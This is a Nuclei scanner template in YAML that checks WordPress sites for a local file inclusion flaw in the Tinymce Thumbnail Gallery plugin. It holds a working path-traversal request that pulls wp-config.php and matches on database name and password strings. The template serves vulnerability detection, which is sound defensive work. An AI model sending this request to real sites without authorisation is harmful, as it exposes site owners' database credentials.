nuclei-templates/vulnerabilities/wordpress/wp-tinymce-lfi.yaml

30 lines
860 B
YAML
Raw Normal View History

id: wp-tinymce-lfi
info:
name: Tinymce Thumbnail Gallery <= 1.0.7 - download-image.php LFI
author: 0x_Akoko
severity: high
description: The Tinymce Thumbnail Gallery WordPress plugin was affected by a download-image.php Local File Inclusion security vulnerability.
reference:
- https://wpscan.com/vulnerability/4a49b023-c1c9-4cc4-a2fd-af5f911bb400
- http://wordpress.org/extend/plugins/tinymce-thumbnail-gallery/
tags: wordpress,wp-theme,lfi,wordpress,tinymce
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=../../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
2021-10-26 09:38:26 +00:00
part: body
words:
- "DB_NAME"
- "DB_PASSWORD"
condition: and
- type: status
status:
- 200